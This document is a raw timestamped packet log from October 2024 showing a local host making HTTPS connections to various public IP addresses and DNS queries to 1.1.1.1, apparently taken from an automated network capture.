Oct 31, 2024 19:19:35.823641062 CET	49896	443	192.168.2.4	35.204.158.49
Oct 31, 2024 19:19:35.823647022 CET	443	49896	35.204.158.49	192.168.2.4
Oct 31, 2024 19:19:35.824114084 CET	49891	443	192.168.2.4	35.214.168.80
Oct 31, 2024 19:19:35.824141979 CET	443	49891	35.214.168.80	192.168.2.4
Oct 31, 2024 19:19:35.824314117 CET	443	49891	35.214.168.80	192.168.2.4
Oct 31, 2024 19:19:35.824317932 CET	49891	443	192.168.2.4	35.214.168.80
Oct 31, 2024 19:19:35.824470997 CET	49891	443	192.168.2.4	35.214.168.80
Oct 31, 2024 19:19:35.824959993 CET	49901	443	192.168.2.4	35.214.168.80
Oct 31, 2024 19:19:35.824992895 CET	443	49901	35.214.168.80	192.168.2.4
Oct 31, 2024 19:19:35.825061083 CET	49901	443	192.168.2.4	35.214.168.80
Oct 31, 2024 19:19:35.826946974 CET	443	49893	172.217.18.4	192.168.2.4
Oct 31, 2024 19:19:35.827672005 CET	49924	443	192.168.2.4	74.119.117.16
Oct 31, 2024 19:19:35.827687979 CET	443	49924	74.119.117.16	192.168.2.4
Oct 31, 2024 19:19:35.827991009 CET	49924	443	192.168.2.4	74.119.117.16
Oct 31, 2024 19:19:35.831724882 CET	49925	443	192.168.2.4	54.170.20.205
Oct 31, 2024 19:19:35.831769943 CET	443	49925	54.170.20.205	192.168.2.4
Oct 31, 2024 19:19:35.831837893 CET	49925	443	192.168.2.4	54.170.20.205
Oct 31, 2024 19:19:35.832437992 CET	49924	443	192.168.2.4	74.119.117.16
Oct 31, 2024 19:19:35.832456112 CET	443	49924	74.119.117.16	192.168.2.4
Oct 31, 2024 19:19:35.833199024 CET	49925	443	192.168.2.4	54.170.20.205
Oct 31, 2024 19:19:35.833225965 CET	443	49925	54.170.20.205	192.168.2.4
Oct 31, 2024 19:19:35.835335970 CET	443	49908	35.190.0.66	192.168.2.4
Oct 31, 2024 19:19:35.835400105 CET	49908	443	192.168.2.4	35.190.0.66
Oct 31, 2024 19:19:35.836628914 CET	49893	443	192.168.2.4	172.217.18.4
Oct 31, 2024 19:19:35.836668015 CET	443	49893	172.217.18.4	192.168.2.4
Oct 31, 2024 19:19:35.836725950 CET	49893	443	192.168.2.4	172.217.18.4
Oct 31, 2024 19:19:35.857712030 CET	443	49889	52.16.92.15	192.168.2.4
Oct 31, 2024 19:19:35.857755899 CET	443	49889	52.16.92.15	192.168.2.4
Oct 31, 2024 19:19:35.857826948 CET	49889	443	192.168.2.4	52.16.92.15
Oct 31, 2024 19:19:35.860621929 CET	49889	443	192.168.2.4	52.16.92.15
Oct 31, 2024 19:19:35.860630035 CET	443	49889	52.16.92.15	192.168.2.4
Oct 31, 2024 19:19:35.860990047 CET	443	49909	51.89.9.252	192.168.2.4
Oct 31, 2024 19:19:35.863194942 CET	49909	443	192.168.2.4	51.89.9.252
Oct 31, 2024 19:19:35.863204956 CET	443	49909	51.89.9.252	192.168.2.4
Oct 31, 2024 19:19:35.864451885 CET	443	49909	51.89.9.252	192.168.2.4
Oct 31, 2024 19:19:35.864530087 CET	49909	443	192.168.2.4	51.89.9.252
Oct 31, 2024 19:19:35.866612911 CET	443	49915	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:35.868645906 CET	49915	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:35.868657112 CET	443	49915	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:35.869054079 CET	443	49915	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:35.869889975 CET	49915	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:35.869966984 CET	443	49915	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:35.871192932 CET	49915	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:35.874249935 CET	49909	443	192.168.2.4	51.89.9.252
Oct 31, 2024 19:19:35.874351978 CET	443	49909	51.89.9.252	192.168.2.4
Oct 31, 2024 19:19:35.874471903 CET	49909	443	192.168.2.4	51.89.9.252
Oct 31, 2024 19:19:35.874480009 CET	443	49909	51.89.9.252	192.168.2.4
Oct 31, 2024 19:19:35.874722004 CET	443	49908	35.190.0.66	192.168.2.4
Oct 31, 2024 19:19:35.875978947 CET	443	49908	35.190.0.66	192.168.2.4
Oct 31, 2024 19:19:35.876023054 CET	49908	443	192.168.2.4	35.190.0.66
Oct 31, 2024 19:19:35.878504992 CET	443	49884	20.157.217.118	192.168.2.4
Oct 31, 2024 19:19:35.878565073 CET	443	49884	20.157.217.118	192.168.2.4
Oct 31, 2024 19:19:35.878804922 CET	49884	443	192.168.2.4	20.157.217.118
Oct 31, 2024 19:19:35.879029989 CET	49908	443	192.168.2.4	35.190.0.66
Oct 31, 2024 19:19:35.879048109 CET	443	49908	35.190.0.66	192.168.2.4
Oct 31, 2024 19:19:35.879055977 CET	49908	443	192.168.2.4	35.190.0.66
Oct 31, 2024 19:19:35.879091024 CET	49908	443	192.168.2.4	35.190.0.66
Oct 31, 2024 19:19:35.883681059 CET	49884	443	192.168.2.4	20.157.217.118
Oct 31, 2024 19:19:35.883691072 CET	443	49884	20.157.217.118	192.168.2.4
Oct 31, 2024 19:19:35.887156010 CET	443	49914	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:35.887350082 CET	49914	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:35.887376070 CET	443	49914	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:35.887753963 CET	443	49914	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:35.888040066 CET	49914	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:35.888103008 CET	443	49914	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:35.888158083 CET	49914	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:35.915333033 CET	443	49915	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:35.931333065 CET	443	49914	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:35.955916882 CET	49909	443	192.168.2.4	51.89.9.252
Oct 31, 2024 19:19:36.252511024 CET	443	49909	51.89.9.252	192.168.2.4
Oct 31, 2024 19:19:36.252567053 CET	443	49909	51.89.9.252	192.168.2.4
Oct 31, 2024 19:19:36.252613068 CET	49909	443	192.168.2.4	51.89.9.252
Oct 31, 2024 19:19:36.253365993 CET	443	49914	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:36.254091978 CET	443	49915	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:36.254132032 CET	443	49915	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:36.254146099 CET	49915	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:36.254153967 CET	443	49915	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:36.254286051 CET	49915	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:36.254292011 CET	443	49915	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:36.265173912 CET	49909	443	192.168.2.4	51.89.9.252
Oct 31, 2024 19:19:36.265201092 CET	443	49909	51.89.9.252	192.168.2.4
Oct 31, 2024 19:19:36.270176888 CET	49915	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:36.270221949 CET	443	49915	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:36.270267010 CET	49915	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:36.273536921 CET	443	49914	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:36.273614883 CET	49914	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:36.282686949 CET	49914	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:36.282700062 CET	443	49914	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:36.305013895 CET	49937	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:36.305033922 CET	443	49937	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:36.305272102 CET	49937	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:36.305855036 CET	49937	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:36.305866003 CET	443	49937	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:36.444438934 CET	443	49920	54.170.20.205	192.168.2.4
Oct 31, 2024 19:19:36.451626062 CET	49920	443	192.168.2.4	54.170.20.205
Oct 31, 2024 19:19:36.451649904 CET	443	49920	54.170.20.205	192.168.2.4
Oct 31, 2024 19:19:36.452030897 CET	443	49920	54.170.20.205	192.168.2.4
Oct 31, 2024 19:19:36.455879927 CET	49920	443	192.168.2.4	54.170.20.205
Oct 31, 2024 19:19:36.455959082 CET	443	49920	54.170.20.205	192.168.2.4
Oct 31, 2024 19:19:36.458134890 CET	49920	443	192.168.2.4	54.170.20.205
Oct 31, 2024 19:19:36.503343105 CET	443	49920	54.170.20.205	192.168.2.4
Oct 31, 2024 19:19:36.546509981 CET	443	49923	35.71.131.137	192.168.2.4
Oct 31, 2024 19:19:36.546839952 CET	49923	443	192.168.2.4	35.71.131.137
Oct 31, 2024 19:19:36.546849012 CET	443	49923	35.71.131.137	192.168.2.4
Oct 31, 2024 19:19:36.548049927 CET	443	49923	35.71.131.137	192.168.2.4
Oct 31, 2024 19:19:36.548408031 CET	49923	443	192.168.2.4	35.71.131.137
Oct 31, 2024 19:19:36.548566103 CET	49923	443	192.168.2.4	35.71.131.137
Oct 31, 2024 19:19:36.548574924 CET	443	49923	35.71.131.137	192.168.2.4
Oct 31, 2024 19:19:36.564834118 CET	443	49924	74.119.117.16	192.168.2.4
Oct 31, 2024 19:19:36.565237999 CET	49924	443	192.168.2.4	74.119.117.16
Oct 31, 2024 19:19:36.565248013 CET	443	49924	74.119.117.16	192.168.2.4
Oct 31, 2024 19:19:36.566277027 CET	443	49924	74.119.117.16	192.168.2.4
Oct 31, 2024 19:19:36.566330910 CET	49924	443	192.168.2.4	74.119.117.16
Oct 31, 2024 19:19:36.570269108 CET	49924	443	192.168.2.4	74.119.117.16
Oct 31, 2024 19:19:36.570339918 CET	443	49924	74.119.117.16	192.168.2.4
Oct 31, 2024 19:19:36.570436954 CET	49924	443	192.168.2.4	74.119.117.16
Oct 31, 2024 19:19:36.591325045 CET	443	49923	35.71.131.137	192.168.2.4
Oct 31, 2024 19:19:36.611358881 CET	443	49924	74.119.117.16	192.168.2.4
Oct 31, 2024 19:19:36.676326990 CET	443	49925	54.170.20.205	192.168.2.4
Oct 31, 2024 19:19:36.678884983 CET	49925	443	192.168.2.4	54.170.20.205
Oct 31, 2024 19:19:36.678905964 CET	443	49925	54.170.20.205	192.168.2.4
Oct 31, 2024 19:19:36.679256916 CET	443	49925	54.170.20.205	192.168.2.4
Oct 31, 2024 19:19:36.680840969 CET	49925	443	192.168.2.4	54.170.20.205
Oct 31, 2024 19:19:36.680912018 CET	443	49925	54.170.20.205	192.168.2.4
Oct 31, 2024 19:19:36.681010008 CET	49925	443	192.168.2.4	54.170.20.205
Oct 31, 2024 19:19:36.698906898 CET	443	49920	54.170.20.205	192.168.2.4
Oct 31, 2024 19:19:36.698985100 CET	443	49920	54.170.20.205	192.168.2.4
Oct 31, 2024 19:19:36.699064016 CET	49920	443	192.168.2.4	54.170.20.205
Oct 31, 2024 19:19:36.699356079 CET	49920	443	192.168.2.4	54.170.20.205
Oct 31, 2024 19:19:36.699372053 CET	443	49920	54.170.20.205	192.168.2.4
Oct 31, 2024 19:19:36.699381113 CET	49920	443	192.168.2.4	54.170.20.205
Oct 31, 2024 19:19:36.699541092 CET	49920	443	192.168.2.4	54.170.20.205
Oct 31, 2024 19:19:36.704802036 CET	443	49923	35.71.131.137	192.168.2.4
Oct 31, 2024 19:19:36.704871893 CET	49923	443	192.168.2.4	35.71.131.137
Oct 31, 2024 19:19:36.720135927 CET	49923	443	192.168.2.4	35.71.131.137
Oct 31, 2024 19:19:36.720143080 CET	443	49923	35.71.131.137	192.168.2.4
Oct 31, 2024 19:19:36.723334074 CET	443	49925	54.170.20.205	192.168.2.4
Oct 31, 2024 19:19:36.735959053 CET	443	49924	74.119.117.16	192.168.2.4
Oct 31, 2024 19:19:36.739012957 CET	49924	443	192.168.2.4	74.119.117.16
Oct 31, 2024 19:19:36.758707047 CET	49924	443	192.168.2.4	74.119.117.16
Oct 31, 2024 19:19:36.758714914 CET	443	49924	74.119.117.16	192.168.2.4
Oct 31, 2024 19:19:37.161386967 CET	443	49925	54.170.20.205	192.168.2.4
Oct 31, 2024 19:19:37.161485910 CET	443	49925	54.170.20.205	192.168.2.4
Oct 31, 2024 19:19:37.161612034 CET	49925	443	192.168.2.4	54.170.20.205
Oct 31, 2024 19:19:37.171116114 CET	443	49937	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:37.171329021 CET	49937	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:37.171350956 CET	443	49937	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:37.171752930 CET	443	49937	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:37.171804905 CET	49937	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:37.172507048 CET	443	49937	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:37.172559023 CET	49937	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:37.172827959 CET	49937	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:37.172888994 CET	443	49937	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:37.172980070 CET	49937	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:37.172987938 CET	443	49937	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:37.176532984 CET	49925	443	192.168.2.4	54.170.20.205
Oct 31, 2024 19:19:37.176556110 CET	443	49925	54.170.20.205	192.168.2.4
Oct 31, 2024 19:19:37.243068933 CET	49937	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:37.460777998 CET	443	49937	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:37.460834980 CET	443	49937	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:37.460896969 CET	443	49937	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:37.460942984 CET	49937	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:37.460964918 CET	443	49937	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:37.460993052 CET	49937	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:37.584230900 CET	443	49937	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:37.584284067 CET	49937	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:37.588040113 CET	49937	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:37.588053942 CET	443	49937	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:37.598922014 CET	49955	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:37.598958969 CET	443	49955	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:37.599119902 CET	49955	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:37.600166082 CET	49956	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:37.600219965 CET	443	49956	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:37.600620031 CET	49956	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:37.602196932 CET	49956	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:37.602216005 CET	443	49956	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:37.602441072 CET	49955	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:37.602461100 CET	443	49955	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:38.453620911 CET	443	49955	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:38.453664064 CET	443	49956	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:38.472769022 CET	49955	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:38.472786903 CET	443	49955	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:38.473282099 CET	443	49955	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:38.473627090 CET	49956	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:38.473649025 CET	443	49956	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:38.474342108 CET	443	49956	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:38.475244045 CET	49955	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:38.475349903 CET	443	49955	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:38.477612019 CET	49956	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:38.477731943 CET	443	49956	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:38.478748083 CET	49955	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:38.478945017 CET	49956	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:38.519342899 CET	443	49955	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:38.523335934 CET	443	49956	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:38.642309904 CET	49969	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:38.642362118 CET	443	49969	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:38.642432928 CET	49969	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:38.643007040 CET	49969	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:38.643022060 CET	443	49969	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:38.649683952 CET	49970	443	192.168.2.4	216.58.206.34
Oct 31, 2024 19:19:38.649715900 CET	443	49970	216.58.206.34	192.168.2.4
Oct 31, 2024 19:19:38.649775982 CET	49970	443	192.168.2.4	216.58.206.34
Oct 31, 2024 19:19:38.649979115 CET	49970	443	192.168.2.4	216.58.206.34
Oct 31, 2024 19:19:38.649996996 CET	443	49970	216.58.206.34	192.168.2.4
Oct 31, 2024 19:19:38.738593102 CET	443	49956	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:38.740144014 CET	443	49955	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:38.740205050 CET	49955	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:38.740850925 CET	49955	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:38.740890980 CET	443	49955	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:38.740957022 CET	49955	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:38.813440084 CET	49956	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:38.813458920 CET	443	49956	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:38.814099073 CET	49956	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:38.814544916 CET	443	49956	142.250.185.142	192.168.2.4
Oct 31, 2024 19:19:38.814608097 CET	49956	443	192.168.2.4	142.250.185.142
Oct 31, 2024 19:19:39.275830984 CET	49975	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:39.275871038 CET	443	49975	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:39.275937080 CET	49975	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:39.276315928 CET	49975	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:39.276328087 CET	443	49975	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:39.493355036 CET	443	49969	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:39.493544102 CET	49969	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:39.493571043 CET	443	49969	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:39.497198105 CET	443	49969	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:39.497256041 CET	49969	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:39.497611046 CET	49969	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:39.497816086 CET	443	49969	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:39.497876883 CET	49969	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:39.504102945 CET	443	49970	216.58.206.34	192.168.2.4
Oct 31, 2024 19:19:39.504302979 CET	49970	443	192.168.2.4	216.58.206.34
Oct 31, 2024 19:19:39.504317045 CET	443	49970	216.58.206.34	192.168.2.4
Oct 31, 2024 19:19:39.505491972 CET	443	49970	216.58.206.34	192.168.2.4
Oct 31, 2024 19:19:39.505552053 CET	49970	443	192.168.2.4	216.58.206.34
Oct 31, 2024 19:19:39.506578922 CET	49970	443	192.168.2.4	216.58.206.34
Oct 31, 2024 19:19:39.506670952 CET	443	49970	216.58.206.34	192.168.2.4
Oct 31, 2024 19:19:39.506738901 CET	49970	443	192.168.2.4	216.58.206.34
Oct 31, 2024 19:19:39.506746054 CET	443	49970	216.58.206.34	192.168.2.4
Oct 31, 2024 19:19:39.543334007 CET	443	49969	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:39.564522028 CET	49969	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:39.564537048 CET	49970	443	192.168.2.4	216.58.206.34
Oct 31, 2024 19:19:39.564554930 CET	443	49969	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:39.713548899 CET	49988	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:39.713570118 CET	443	49988	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:39.713834047 CET	49988	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:39.714031935 CET	49988	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:39.714046001 CET	443	49988	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:39.726821899 CET	49989	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:39.726839066 CET	443	49989	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:39.727173090 CET	49989	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:39.727543116 CET	49989	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:39.727556944 CET	443	49989	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:39.752099991 CET	49969	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:39.778130054 CET	443	49970	216.58.206.34	192.168.2.4
Oct 31, 2024 19:19:39.778183937 CET	443	49970	216.58.206.34	192.168.2.4
Oct 31, 2024 19:19:39.778268099 CET	443	49970	216.58.206.34	192.168.2.4
Oct 31, 2024 19:19:39.778306007 CET	49970	443	192.168.2.4	216.58.206.34
Oct 31, 2024 19:19:39.778321981 CET	443	49970	216.58.206.34	192.168.2.4
Oct 31, 2024 19:19:39.778362036 CET	443	49970	216.58.206.34	192.168.2.4
Oct 31, 2024 19:19:39.778393030 CET	443	49970	216.58.206.34	192.168.2.4
Oct 31, 2024 19:19:39.778405905 CET	49970	443	192.168.2.4	216.58.206.34
Oct 31, 2024 19:19:39.778414965 CET	443	49970	216.58.206.34	192.168.2.4
Oct 31, 2024 19:19:39.778469086 CET	49970	443	192.168.2.4	216.58.206.34
Oct 31, 2024 19:19:39.778872013 CET	443	49970	216.58.206.34	192.168.2.4
Oct 31, 2024 19:19:39.779012918 CET	49970	443	192.168.2.4	216.58.206.34
Oct 31, 2024 19:19:39.779019117 CET	443	49970	216.58.206.34	192.168.2.4
Oct 31, 2024 19:19:39.856796026 CET	49970	443	192.168.2.4	216.58.206.34
Oct 31, 2024 19:19:40.040911913 CET	49994	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:40.040925980 CET	443	49994	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:40.041610956 CET	49994	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:40.041892052 CET	49994	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:40.041904926 CET	443	49994	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:40.119724035 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:40.119770050 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:40.119853973 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:40.120601892 CET	49996	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:40.120619059 CET	443	49996	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:40.146126986 CET	443	49970	216.58.206.34	192.168.2.4
Oct 31, 2024 19:19:40.146786928 CET	49997	443	192.168.2.4	34.160.236.64
Oct 31, 2024 19:19:40.146820068 CET	443	49997	34.160.236.64	192.168.2.4
Oct 31, 2024 19:19:40.146891117 CET	49997	443	192.168.2.4	34.160.236.64
Oct 31, 2024 19:19:40.149769068 CET	443	49975	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:40.150918007 CET	443	49970	216.58.206.34	192.168.2.4
Oct 31, 2024 19:19:40.150953054 CET	443	49970	216.58.206.34	192.168.2.4
Oct 31, 2024 19:19:40.150985956 CET	49970	443	192.168.2.4	216.58.206.34
Oct 31, 2024 19:19:40.150986910 CET	443	49970	216.58.206.34	192.168.2.4
Oct 31, 2024 19:19:40.151005030 CET	443	49970	216.58.206.34	192.168.2.4
Oct 31, 2024 19:19:40.151030064 CET	49970	443	192.168.2.4	216.58.206.34
Oct 31, 2024 19:19:40.151146889 CET	443	49969	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:40.151171923 CET	443	49970	216.58.206.34	192.168.2.4
Oct 31, 2024 19:19:40.151174068 CET	443	49969	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:40.151185036 CET	443	49969	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:40.151211023 CET	443	49969	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:40.151220083 CET	443	49969	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:40.151232958 CET	443	49969	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:40.151237011 CET	49970	443	192.168.2.4	216.58.206.34
Oct 31, 2024 19:19:40.151237011 CET	49969	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:40.151276112 CET	443	49969	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:40.151289940 CET	49969	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:40.151319027 CET	49969	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:40.151323080 CET	443	49969	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:40.151990891 CET	49969	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:40.160639048 CET	49997	443	192.168.2.4	34.160.236.64
Oct 31, 2024 19:19:40.160653114 CET	443	49997	34.160.236.64	192.168.2.4
Oct 31, 2024 19:19:40.161716938 CET	50004	443	192.168.2.4	74.119.117.16
Oct 31, 2024 19:19:40.161726952 CET	443	50004	74.119.117.16	192.168.2.4
Oct 31, 2024 19:19:40.161803961 CET	50004	443	192.168.2.4	74.119.117.16
Oct 31, 2024 19:19:40.164424896 CET	49975	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:40.164453030 CET	443	49975	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:40.164597988 CET	50004	443	192.168.2.4	74.119.117.16
Oct 31, 2024 19:19:40.164613008 CET	443	50004	74.119.117.16	192.168.2.4
Oct 31, 2024 19:19:40.164885998 CET	443	49975	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:40.166618109 CET	49975	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:40.166843891 CET	443	49975	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:40.167030096 CET	49975	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:40.167881966 CET	49970	443	192.168.2.4	216.58.206.34
Oct 31, 2024 19:19:40.167891979 CET	443	49970	216.58.206.34	192.168.2.4
Oct 31, 2024 19:19:40.175795078 CET	49969	443	192.168.2.4	160.153.155.187
Oct 31, 2024 19:19:40.175817966 CET	443	49969	160.153.155.187	192.168.2.4
Oct 31, 2024 19:19:40.183079958 CET	50018	443	192.168.2.4	216.58.206.65
Oct 31, 2024 19:19:40.183089972 CET	443	50018	216.58.206.65	192.168.2.4
Oct 31, 2024 19:19:40.183270931 CET	50018	443	192.168.2.4	216.58.206.65
Oct 31, 2024 19:19:40.183450937 CET	50018	443	192.168.2.4	216.58.206.65
Oct 31, 2024 19:19:40.183463097 CET	443	50018	216.58.206.65	192.168.2.4
Oct 31, 2024 19:19:40.207344055 CET	443	49975	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:40.431782961 CET	443	49975	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:40.556231022 CET	443	49975	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:40.558079004 CET	49975	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:40.579284906 CET	51189	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:40.584278107 CET	53	51189	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:40.586404085 CET	51189	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:40.591660976 CET	51189	53	192.168.2.4	1.1.1.1
Oct 31, 2024 19:19:40.596585035 CET	53	51189	1.1.1.1	192.168.2.4
Oct 31, 2024 19:19:40.719685078 CET	49975	443	192.168.2.4	142.250.186.174
Oct 31, 2024 19:19:40.719712019 CET	443	49975	142.250.186.174	192.168.2.4
Oct 31, 2024 19:19:40.777400970 CET	443	49997	34.160.236.64	192.168.2.4
Oct 31, 2024 19:19:40.778119087 CET	49997	443	192.168.2.4	34.160.236.64
Oct 31, 2024 19:19:40.778131962 CET	443	49997	34.160.236.64	192.168.2.4
Oct 31, 2024 19:19:40.778642893 CET	443	49997	34.160.236.64	192.168.2.4
Oct 31, 2024 19:19:40.778810978 CET	49997	443	192.168.2.4	34.160.236.64
Oct 31, 2024 19:19:40.779493093 CET	443	49997	34.160.236.64	192.168.2.4
